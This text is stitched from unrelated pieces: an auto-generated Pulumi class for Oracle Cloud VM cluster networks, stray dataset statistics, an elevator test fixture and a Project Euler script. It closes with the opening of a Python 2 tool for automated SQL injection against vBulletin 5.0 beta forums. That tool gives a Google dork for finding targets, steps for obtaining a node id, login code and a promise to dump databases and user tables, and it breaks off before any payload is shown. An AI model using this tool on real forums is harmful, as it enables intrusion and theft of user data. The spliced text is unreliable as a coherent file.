The date and time when the VM cluster network was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="validateVmClusterNetwork")
    def validate_vm_cluster_network(self) -> Optional[pulumi.Input[bool]]:
        """
        A boolean flag indicating whether to validate the VM cluster network.
        """
        return pulumi.get(self, "validate_vm_cluster_network")
@validate_vm_cluster_network.setter
def validate_vm_cluster_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "validate_vm_cluster_network", value)
@property
@pulumi.getter(name="vmClusterId")
def vm_cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
"""
return pulumi.get(self, "vm_cluster_id")
@vm_cluster_id.setter
def vm_cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vm_cluster_id", value)
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
@vm_networks.setter
def vm_networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]]):
pulumi.set(self, "vm_networks", value)


class VmClusterNetwork(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None,
__props__=None):
"""
This resource provides the Vm Cluster Network resource in Oracle Cloud Infrastructure Database service.
Creates the VM cluster network. Applies to Exadata Cloud@Customer instances only.
        To create a cloud VM cluster in an Exadata Cloud Service instance, use the [CreateCloudVmCluster](https://docs.cloud.oracle.com/iaas/api/#/en/database/latest/CloudVmCluster/CreateCloudVmCluster) operation.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_vm_cluster_network = oci.database.VmClusterNetwork("testVmClusterNetwork",
compartment_id=var["compartment_id"],
display_name=var["vm_cluster_network_display_name"],
exadata_infrastructure_id=oci_database_exadata_infrastructure["test_exadata_infrastructure"]["id"],
scans=[oci.database.VmClusterNetworkScanArgs(
hostname=var["vm_cluster_network_scans_hostname"],
ips=var["vm_cluster_network_scans_ips"],
port=var["vm_cluster_network_scans_port"],
)],
vm_networks=[oci.database.VmClusterNetworkVmNetworkArgs(
domain_name=var["vm_cluster_network_vm_networks_domain_name"],
gateway=var["vm_cluster_network_vm_networks_gateway"],
netmask=var["vm_cluster_network_vm_networks_netmask"],
network_type=var["vm_cluster_network_vm_networks_network_type"],
nodes=[oci.database.VmClusterNetworkVmNetworkNodeArgs(
hostname=var["vm_cluster_network_vm_networks_nodes_hostname"],
ip=var["vm_cluster_network_vm_networks_nodes_ip"],
vip=var["vm_cluster_network_vm_networks_nodes_vip"],
vip_hostname=var["vm_cluster_network_vm_networks_nodes_vip_hostname"],
)],
vlan_id=var["vm_cluster_network_vm_networks_vlan_id"],
)],
defined_tags=var["vm_cluster_network_defined_tags"],
dns=var["vm_cluster_network_dns"],
freeform_tags={
"Department": "Finance",
},
ntps=var["vm_cluster_network_ntp"],
validate_vm_cluster_network=var["vm_cluster_network_validate_vm_cluster_network"])
```
## Import
VmClusterNetworks can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/vmClusterNetwork:VmClusterNetwork test_vm_cluster_network "exadataInfrastructures/{exadataInfrastructureId}/vmClusterNetworks/{vmClusterNetworkId}"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]] scans: (Updatable) The SCAN details.
        :param pulumi.Input[bool] validate_vm_cluster_network: A boolean flag indicating whether to validate the VM cluster network.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]] vm_networks: (Updatable) Details of the client and backup networks.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VmClusterNetworkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Vm Cluster Network resource in Oracle Cloud Infrastructure Database service.
Creates the VM cluster network. Applies to Exadata Cloud@Customer instances only.
        To create a cloud VM cluster in an Exadata Cloud Service instance, use the [CreateCloudVmCluster](https://docs.cloud.oracle.com/iaas/api/#/en/database/latest/CloudVmCluster/CreateCloudVmCluster) operation.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_vm_cluster_network = oci.database.VmClusterNetwork("testVmClusterNetwork",
compartment_id=var["compartment_id"],
display_name=var["vm_cluster_network_display_name"],
exadata_infrastructure_id=oci_database_exadata_infrastructure["test_exadata_infrastructure"]["id"],
scans=[oci.database.VmClusterNetworkScanArgs(
hostname=var["vm_cluster_network_scans_hostname"],
ips=var["vm_cluster_network_scans_ips"],
port=var["vm_cluster_network_scans_port"],
)],
vm_networks=[oci.database.VmClusterNetworkVmNetworkArgs(
domain_name=var["vm_cluster_network_vm_networks_domain_name"],
gateway=var["vm_cluster_network_vm_networks_gateway"],
netmask=var["vm_cluster_network_vm_networks_netmask"],
network_type=var["vm_cluster_network_vm_networks_network_type"],
nodes=[oci.database.VmClusterNetworkVmNetworkNodeArgs(
hostname=var["vm_cluster_network_vm_networks_nodes_hostname"],
ip=var["vm_cluster_network_vm_networks_nodes_ip"],
vip=var["vm_cluster_network_vm_networks_nodes_vip"],
vip_hostname=var["vm_cluster_network_vm_networks_nodes_vip_hostname"],
)],
vlan_id=var["vm_cluster_network_vm_networks_vlan_id"],
)],
defined_tags=var["vm_cluster_network_defined_tags"],
dns=var["vm_cluster_network_dns"],
freeform_tags={
"Department": "Finance",
},
ntps=var["vm_cluster_network_ntp"],
validate_vm_cluster_network=var["vm_cluster_network_validate_vm_cluster_network"])
```
## Import
VmClusterNetworks can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/vmClusterNetwork:VmClusterNetwork test_vm_cluster_network "exadataInfrastructures/{exadataInfrastructureId}/vmClusterNetworks/{vmClusterNetworkId}"
```
:param str resource_name: The name of the resource.
:param VmClusterNetworkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VmClusterNetworkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VmClusterNetworkArgs.__new__(VmClusterNetworkArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["dns"] = dns
if exadata_infrastructure_id is None and not opts.urn:
raise TypeError("Missing required property 'exadata_infrastructure_id'")
__props__.__dict__["exadata_infrastructure_id"] = exadata_infrastructure_id
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["ntps"] = ntps
if scans is None and not opts.urn:
raise TypeError("Missing required property 'scans'")
__props__.__dict__["scans"] = scans
__props__.__dict__["validate_vm_cluster_network"] = validate_vm_cluster_network
if vm_networks is None and not opts.urn:
raise TypeError("Missing required property 'vm_networks'")
__props__.__dict__["vm_networks"] = vm_networks
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["vm_cluster_id"] = None
super(VmClusterNetwork, __self__).__init__(
'oci:database/vmClusterNetwork:VmClusterNetwork',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_cluster_id: Optional[pulumi.Input[str]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None) -> 'VmClusterNetwork':
"""
Get an existing VmClusterNetwork resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]] scans: (Updatable) The SCAN details.
:param pulumi.Input[str] state: The current state of the VM cluster network.
:param pulumi.Input[str] time_created: The date and time when the VM cluster network was created.
        :param pulumi.Input[bool] validate_vm_cluster_network: A boolean flag indicating whether to validate the VM cluster network.
:param pulumi.Input[str] vm_cluster_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]] vm_networks: (Updatable) Details of the client and backup networks.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VmClusterNetworkState.__new__(_VmClusterNetworkState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["dns"] = dns
__props__.__dict__["exadata_infrastructure_id"] = exadata_infrastructure_id
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["ntps"] = ntps
__props__.__dict__["scans"] = scans
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["validate_vm_cluster_network"] = validate_vm_cluster_network
__props__.__dict__["vm_cluster_id"] = vm_cluster_id
__props__.__dict__["vm_networks"] = vm_networks
return VmClusterNetwork(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def dns(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> pulumi.Output[str]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter
def ntps(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@property
@pulumi.getter
def scans(self) -> pulumi.Output[Sequence['outputs.VmClusterNetworkScan']]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the VM cluster network.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time when the VM cluster network was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="validateVmClusterNetwork")
    def validate_vm_cluster_network(self) -> pulumi.Output[Optional[bool]]:
        """
        A boolean flag indicating whether to validate the VM cluster network.
        """
        return pulumi.get(self, "validate_vm_cluster_network")
@property
@pulumi.getter(name="vmClusterId")
def vm_cluster_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
"""
return pulumi.get(self, "vm_cluster_id")
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> pulumi.Output[Sequence['outputs.VmClusterNetworkVmNetwork']]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
| 52.703752 | 347 | 0.675405 | 4,778 | 40,740 | 5.536836 | 0.052532 | 0.085655 | 0.048157 | 0.04914 | 0.918352 | 0.898696 | 0.878586 | 0.858174 | 0.853752 | 0.822982 | 0 | 0.000467 | 0.21242 | 40,740 | 772 | 348 | 52.772021 | 0.824035 | 0.405351 | 0 | 0.689573 | 1 | 0 | 0.126181 | 0.054901 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163507 | false | 0.00237 | 0.016588 | 0.007109 | 0.279621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ace865d9ded6e26bcfc3d3dc7f19574ee23b0ca5 | 303 | py | Python | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_1 = {
"id": "A",
"session": "alpha",
"time": 1,
"floor": 1,
"people": 0,
"direction": "stationary",
"stops": []
}
elevator_2 = {
"id": "B",
"session": "alpha",
"time": 1,
"floor": 1,
"people": 0,
"direction": "stationary",
"stops": []
}
| 15.15 | 30 | 0.442244 | 30 | 303 | 4.4 | 0.5 | 0.181818 | 0.242424 | 0.257576 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0 | 0.038095 | 0.306931 | 303 | 19 | 31 | 15.947368 | 0.590476 | 0 | 0 | 0.666667 | 0 | 0 | 0.356436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c5afc7115d342554ea72729143661de488450c48 | 41 | py | Python | src/__init__.py | openclimatefix/predict_pv_yield_OLD | e569e240915ba17b8f6274814f8ceaeebb8ab32b | [
"Apache-2.0"
] | 1 | 2021-07-10T17:48:46.000Z | 2021-07-10T17:48:46.000Z | src/__init__.py | merq2019/predict_pv_yield | 7db72e6d16bed90927a3e1b28037c66c3dabe307 | [
"Apache-2.0"
] | null | null | null | src/__init__.py | merq2019/predict_pv_yield | 7db72e6d16bed90927a3e1b28037c66c3dabe307 | [
"Apache-2.0"
] | null | null | null | from . import features
from . import data

# File: Project Euler/pe13.py (repo: NicolasBizzozzero/Online-Judges, license: Unlicense)
] | null | null | null | str = "371072875339021027987979982208375902465101357402504637693767749000971264812489697007805041701826053874324986199524741059474233309513058123726617309629919422133635741615725224305633018110724061549082502306758820753934617117198031042104751377806324667689261670696623633820136378418383684178734361726757281128798128499794080654819315926216912758898327384427422891743252032192358942287679648767027218931847451445736001306439091167216856844588711603153276703864861058430254399396198289175936656867579349516217645714185656062950215722319658675507932419333164906352462741904929101432445813822663347944758178925758677183372176619637515905792397282455988384075820356532535939900840263356894883018945862822782880181199384826282014278194139940567587151170094390353986643728271126538299872407844730531901042935868651550600629586486153207527337195919142051725582971693888707715466499115593487603532921714970056938543700705768266846246214956500764717872944383776045328265410875682844319119063469403785521777929514536123272525000296071075082563815656710885258350721458765761724109764473391106072182652368772236360451742370690585186066044820762120981328786073396941281142660418086830619328460811191061556940512689692519343254517283886419180470492932150586425630494836246722164843507620172791803994469300473295634069115732444386908125794514089057706229429197107928209550376875256787730918625407449698445083303936821261833638482533015468619612434876768129753437594651580386287592878490201521685554828717201219257766954781828337579931036147403568564490955270978647975811672632010043689784255353992093183744149780686098448403098129077791799088218795327364475675590848030870869875513927118545170785441618524243206931503325995940689575653678210707492696653767632623544721069793950679652694742597709739166693763042633987085105268470829908521139942736573411618276031500127165378607361501080857009149939512557028198746004375582903531743471732693212357815498262974255273730794953759765105305946
96606768315657437716740187527588902802571733229619176668713819931811048770190271252676802760780030136786809925254634010616328665263627021854049770558562994658063623799314074625596224074486908231174977792365466257246923322810917141914302881971032885978066697608929386382850253334033441306557801612781592181500556186883646842009047023053081172816430487623791969842487255036638784583114876969321549028104240201383351244621814417734706378329949063625966649858761822122522551248676453367720186971698544312419572409913959008952310058822955482553002635207815322967962494816419538682187746085327132285723110424803456124867697064507995236377742425354112916842768655389262050249103265729672370191327572567528565324825826546309220705859652229798860272258331913126375147341994889534765745501184957014548792889848568277260777137214037988797153829820378303147352772158034814451349137322665138134829543829199918180278916522431027392251122869539409579530664052326325380441000596549391598795936352974615218550237130764225512118369380358038858490341698116222072977186158236678424689157993532961922624679571944012690438771072750481023908955235974572318970677254791506150550495392297953090112996751986188088225875314529584099251203829009407770775672113067397083047244838165338735023408456470580773088295917476714036319800818712901187549131054712658197623331044818386269515456334926366572897563400500428462801835170705278318394258821455212272512503275512160354698120058176216521282765275169129689778932238195734329339946437501907836945765883352399886755061649651847751807381688378610915273579297013376217784275219262340194239963916804498399317331273132924185707147349566916674687634660915035914677504995186714302352196288948901024233251169136196266227326746080059154747183079839286853520694694454072476841822524674417161514036427982273348055556214818971426179103425986472045168939894221798260880768528778364618279934631376775430780936333301898264209010848802521674670883215120185883543223812876952786713296124747824645386
369930090493103636197638780396218407357239979422340623539380833965132740801111666627891981488087797941876876144230030984490851411606618262936828367647447792391803351109890697907148578694408955299065364044742557608365997664579509666024396409905389607120198219976047599490197230297649139826800329731560371200413779037855660850892521673093931987275027546890690370753941304265231501194809377245048795150954100921645863754710598436791786391670211874924319957006419179697775990283006991536871371193661495281130587638027841075444973307840789923115535562561142322423255033685442488917353448899115014406480203690680639606723221932041495354150312888033953605329934036800697771065056663195481234880673210146739058568557934581403627822703280826165707739483275922328459417065250945123252306082291880205877731971983945018088807242966198081119777158542502016545090413245809786882778948721859617721078384350691861554356628840622574736922845095162084960398013400172393067166682355524525280460972253503534226472524250874054075591789781264330331690"
str = [int(i) for i in str.split("\n")]  # note: `str` here shadows the builtin
S = sum(str)
resultat = format(S)[:10]  # first ten digits of the sum; an int cannot be sliced directly
print(resultat)
input()
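The script above tackles Project Euler problem 13: work out the first ten digits of the sum of one hundred 50-digit numbers. Python's arbitrary-precision integers make the core computation trivial; a minimal self-contained sketch of the same technique, with an illustrative function name and three sample numbers in place of the original data:

```python
def first_digits_of_sum(numbers, n_digits=10):
    """Sum arbitrary-precision integers and return the leading digits as a string."""
    return str(sum(numbers))[:n_digits]

# Three sample 50-digit integers (the real input has one hundred of them).
sample = [
    37107287533902102798797998220837590246510135740250,
    46376937677490009712648124896970078050417018260538,
    74324986199524741059474233309513058123726617309629,
]
print(first_digits_of_sum(sample))
```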
# File: Vbulletin 5.0 auto injector.py (repo: xceptioncode/VBulletin-5.0-auto-sql-injector, license: MIT)
#!/usr/bin/python
# File : VBulletin 5.0 Beta Exploit
#
# Date : 14.04.2013
#
# Vulnerability : Sql Injection
# Vulnerable Version : VBulletin 5.0 Beta ( All Upto Beta 28 )
#
# Exploit Author : Shubham Raj (Xception Code)
# Facebook : http://www.facebook.com/xceptioncode
# Twitter : https://twitter.com/xceptioncode
#
# This is an exploit to automate the process of exploiting VBulletin 5.0 Beta
# with a SQL injection vulnerability.
# This vulnerability exists in almost all beta releases of VBulletin 5.0 to date, up to Beta 28.
#
# Vulnerability Discovered By 0x0A
# Exploit Coded By Shubham Raj
#
# Join Openfire-Security Forum : http://www.openfire-security.net/forum/
#
# Script Publicly released on 28.06.2013 In Openfire Security Forum
# link => http://forum.openfire-security.net/threads/vbulletin-5-0-automatic-injector-and-data-extractor-python-download-xception-code.12241/
#
#
# Google Dork : Powered by vBulletin™ Version 5.0.0 Beta etc etc (apply your brain)
import urllib2, sys, re, urllib, os
from cookielib import CookieJar
def use():
print "[=] Usage : exploit.py SITE USERNAME PASSWORD NODEID OPTION(common/all)"
print "[=] Example : www.host.com/forum/ xxxx xxxxx 124 common/all"
print "\n[=] Or enter help to get described option, like exploit.py help"
exit()
def help():
print """
[=] Usage : exploit.py SITE USERNAME PASSWORD NODEID OPTION(common/all)
[=] Example : www.host.com/forum xxxx xxxxx 124 common/all
Options = common / all
common :
If you choose the common option, you will get some basic data extracted from the
given target: the version, the current database name, the current user name, and
the first row of the table user of the current database, if it exists.
all :
If you choose the all option, you will get all the info of the common option,
along with :
automatic extraction of databases
automatic extraction of all rows from the table user of the current database, if it exists
extraction of the tables of a given database ( user input )
extraction of the columns of a given database and table ( user input )
fetching data from a given database -> table -> column
Also, more control over the whole process.
All output is automatically saved to target(name).txt in the current directory.
If the file already exists, output is appended to the existing file.
To use this exploit, you must first be registered on your target site.
Next, you need a valid node id.
SITE :
site is your target site link, followed by the vbulletin path and a slash at the end.
USERNAME :
username is the username with which you registered on the target site
PASSWORD :
password is the password for the given username
NODE_ID :
To get node id for your target site, follow these steps :
1. log in to your target with your credentials using mozilla firefox
2. open any topic/thread on target
3. open "LIVE HTTP HEADERS" in browser. You can install "LIVE HTTP HEADERS"
from here : https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
4. Install "LIVE HTTP HEADERS"
5. On any topic/thread of target, click like button at below of the post.
( Image => http://s9.postimg.org/ij0gr72by/forum1.jpg )
6. Now, find up this link in "LIVE HTTP HEADERS" , link = target/ajax/api/reputation/vote
( Image => http://s12.postimg.org/492ph1y4t/forum2.png )
7. Now, click the replay button in "LIVE HTTP HEADERS", and send the post content.
You will get nodeid=value ( Image => http://s7.postimg.org/op271c116/forum3.jpg )
8. So, here value is node_id . Use value of node id to inject and exploit your target.
Exploit Information :
Vulnerability : Sql Injection
Vulnerable Version : VBulletin 5.0 Beta ( All Upto Beta 28 )
Vulnerability Credit : 0x0A
Contact : Not Available
Exploit Author : Xception Code
Contact : http://www.facebook.com/xceptioncode
This is an exploit to automate process of exploiting Vbulletin 5.0 Beta
With sql injection vulnerability.
This vulnerability exists in almost all beta releases of Vbulletin 5.0 till date which is beta 28.
Vulnerability Discovered By 0x0A
Exploit Coded By Xception Code
"""
try:
print """\t\t\t
\t\t__ __ _ _
\t\t\ \/ /___ ___ _ __ | |_(_) ___ _ __
\t\t \ // __/ _ \ '_ \| __| |/ _ \| '_ \
\t\t / \ (_| __/ |_) | |_| | (_) | | | |
\t\t/_/\_\___\___| .__/ \__|_|\___/|_| |_|
\t\t |_|
\t\t ___ _
\t\t / __\___ __| | ___
\t\t / / / _ \ / _` |/ _ \
\t\t/ /__| (_) | (_| | __/
\t\t\____/\___/ \__,_|\___|
\t\t\t\t\t VBulletin 5.0 Automated Injector.
"""
if sys.argv[1] == 'help':
help()
elif len(sys.argv) < 5:
use()
else:
pass
host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
node = sys.argv[4]
opt = sys.argv[5]
new_host = host.replace('.', '_')
new_host1 = new_host.replace('http://', '')
new_host2 = new_host1.replace('/', '')
def common():
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = { "url" : host, "username" : username, "password" : password }
data_encoded = urllib.urlencode(formdata)
print "\n[+] Logging in .. "
print "[+] Username : " + username + ""
print "[+] Password : " + password + ""
print "[+] Node id : " + node + ""
if os.path.exists(new_host2 + '.txt'):
file = open(new_host2 + '.txt', "a")
